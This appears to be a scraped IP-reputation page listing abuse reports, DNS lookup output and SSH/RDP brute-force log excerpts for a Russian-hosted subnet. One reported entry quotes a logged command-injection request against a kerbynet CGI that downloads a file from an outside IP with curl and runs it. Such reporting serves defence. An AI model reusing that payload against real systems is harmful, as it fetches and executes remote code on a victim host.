45.136.108.162

Basic Info

City: unknown

Region: unknown

Country: Russian Federation

Internet Service Provider: ComTrade LLC

Hostname: unknown

Organization: unknown

Usage Type: Data Center/Web Hosting/Transit

Comments:

Make a comment on this IP

Type	Details	Datetime
attackbots	ET CINS Active Threat Intelligence Poor Reputation IP group 31 - port: 500 proto: TCP cat: Misc Attack	2019-12-24 05:10:38

Comments on same subnet:

IP	Type	Details	Datetime
45.136.108.22	attackspambots	45.136.108.22 - - [31/Aug/2020:07:28:26 -0500] "- / HTTP/1.0" 400 219 000 0 0 0 15 282 0 0 0 NONE FIN FIN ERR_INVALID_REQ	2020-09-01 04:38:43
45.136.108.22	attack	Unauthorized connection attempt from IP address 45.136.108.22 on port 993	2020-08-29 02:06:36
45.136.108.24	attackspambots	SSH login attempts.	2020-08-22 23:35:58
45.136.108.22	attackspambots	Fail2Ban Ban Triggered	2020-08-19 09:11:16
45.136.108.65	attack	[14/Aug/2020:05:14:56 -0400] "\x03" Blank UA	2020-08-16 04:36:35
45.136.108.67	attack	Unauthorized connection attempt detected from IP address 45.136.108.67 to port 2261 [T]	2020-08-16 04:36:18
45.136.108.24	attackspam	Unauthorized connection attempt detected from IP address 45.136.108.24 to port 4453 [T]	2020-08-14 02:36:09
45.136.108.65	attackbotsspam	Unauthorized connection attempt detected from IP address 45.136.108.65 to port 968 [T]	2020-08-14 02:12:50
45.136.108.66	attackbotsspam	Unauthorized connection attempt detected from IP address 45.136.108.66 to port 1723 [T]	2020-08-14 02:12:33
45.136.108.68	attack	Unauthorized connection attempt detected from IP address 45.136.108.68 to port 3424 [T]	2020-08-14 02:12:09
45.136.108.22	attackbotsspam	Port scan detected	2020-08-14 01:49:56
45.136.108.67	attackspambots	Unauthorized connection attempt detected from IP address 45.136.108.67 to port 2925 [T]	2020-08-14 01:49:28
45.136.108.62	attack	Unauthorized connection attempt detected from IP address 45.136.108.62 to port 9055 [T]	2020-08-14 01:07:35
45.136.108.80	attackspambots	2020-08-12T12:42:42Z - RDP login failed multiple times. (45.136.108.80)	2020-08-12 22:09:08
45.136.108.18	attack	RDP brute forcing (r)	2020-08-04 21:39:59

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 45.136.108.162
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 55501
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;45.136.108.162.			IN	A

;; AUTHORITY SECTION:
.			205	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019122300 1800 900 604800 86400

;; Query time: 103 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Dec 23 19:25:28 CST 2019
;; MSG SIZE  rcvd: 118

Host info

Host 162.108.136.45.in-addr.arpa. not found: 3(NXDOMAIN)

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 162.108.136.45.in-addr.arpa: NXDOMAIN

Related IP info:

Related comments:

IP	Type	Details	Datetime
221.143.48.143	attack	Sep 1 19:40:45 rotator sshd\[16792\]: Address 221.143.48.143 maps to mailfwd.mailplug.co.kr, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!Sep 1 19:40:48 rotator sshd\[16792\]: Failed password for root from 221.143.48.143 port 33726 ssh2Sep 1 19:44:19 rotator sshd\[16809\]: Address 221.143.48.143 maps to mailfwd.mailplug.co.kr, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!Sep 1 19:44:19 rotator sshd\[16809\]: Invalid user made from 221.143.48.143Sep 1 19:44:21 rotator sshd\[16809\]: Failed password for invalid user made from 221.143.48.143 port 41260 ssh2Sep 1 19:47:58 rotator sshd\[17571\]: Address 221.143.48.143 maps to mailfwd.mailplug.co.kr, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT!Sep 1 19:47:58 rotator sshd\[17571\]: Invalid user hadoop from 221.143.48.143 ...	2020-09-02 04:41:41
167.249.168.131	spambotsattackproxynormal	PAIN DOMINA Gmail YouTube Vírus 17:59	2020-09-02 04:59:30
93.153.173.102	attackbots	Sep 1 13:26:14 shivevps sshd[27182]: Bad protocol version identification '\024' from 93.153.173.102 port 50006 ...	2020-09-02 04:54:42
62.234.130.87	attackspam	Brute-force attempt banned	2020-09-02 05:06:44
66.70.142.231	attackbots	Unauthorised connection attempt detected at AUO MAIN. System is sshd. Protected by AUO Stack Web Application Firewall (WAF)	2020-09-02 04:42:30
119.18.157.154	attack	Sep 1 13:26:39 shivevps sshd[27485]: Bad protocol version identification '\024' from 119.18.157.154 port 53440 ...	2020-09-02 04:36:38
182.208.252.91	attackbots	Sep 1 14:30:54 web8 sshd\[20912\]: Invalid user oracle from 182.208.252.91 Sep 1 14:30:54 web8 sshd\[20912\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=182.208.252.91 Sep 1 14:30:56 web8 sshd\[20912\]: Failed password for invalid user oracle from 182.208.252.91 port 40328 ssh2 Sep 1 14:33:54 web8 sshd\[22271\]: Invalid user zy from 182.208.252.91 Sep 1 14:33:54 web8 sshd\[22271\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=182.208.252.91	2020-09-02 04:49:24
192.241.227.232	attackbots	GPL SNMP public access udp - port: 161 proto: snmp cat: Attempted Information Leakbytes: 85	2020-09-02 04:39:25
73.217.210.236	spambotsattackproxynormal	My comcast router is hacked by a PROXY server	2020-09-02 04:59:29
140.207.81.233	attackspambots	Sep 1 22:36:44 buvik sshd[18154]: Invalid user gmodserver from 140.207.81.233 Sep 1 22:36:44 buvik sshd[18154]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=140.207.81.233 Sep 1 22:36:46 buvik sshd[18154]: Failed password for invalid user gmodserver from 140.207.81.233 port 55615 ssh2 ...	2020-09-02 05:04:42
176.108.27.157	attackspambots	honeypot forum registration (user=Marionbit; email=gerbSorail@gmail.com)	2020-09-02 05:04:19
202.57.40.227	attack	GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://5.206.227.228/zero;sh zero;" HTTP/1.0	2020-09-02 04:51:28
106.13.128.71	attack	" "	2020-09-02 04:59:04
119.63.138.25	attack	php WP PHPmyadamin ABUSE blocked for 12h	2020-09-02 05:08:33
167.249.168.131	bots	https://youtu.be/OORReN7pQ5M	2020-09-02 05:09:05

Recently Reported IPs

217.249.130.106	156.213.229.209	82.200.30.162	156.198.89.55
45.162.62.94	156.199.51.115	61.161.191.58	116.103.232.158
77.45.157.140	156.207.201.0	197.40.99.245	156.195.75.198
197.40.134.36	208.113.153.233	49.147.119.33	115.79.51.177
41.37.101.38	197.43.203.16	162.241.149.130	156.212.117.216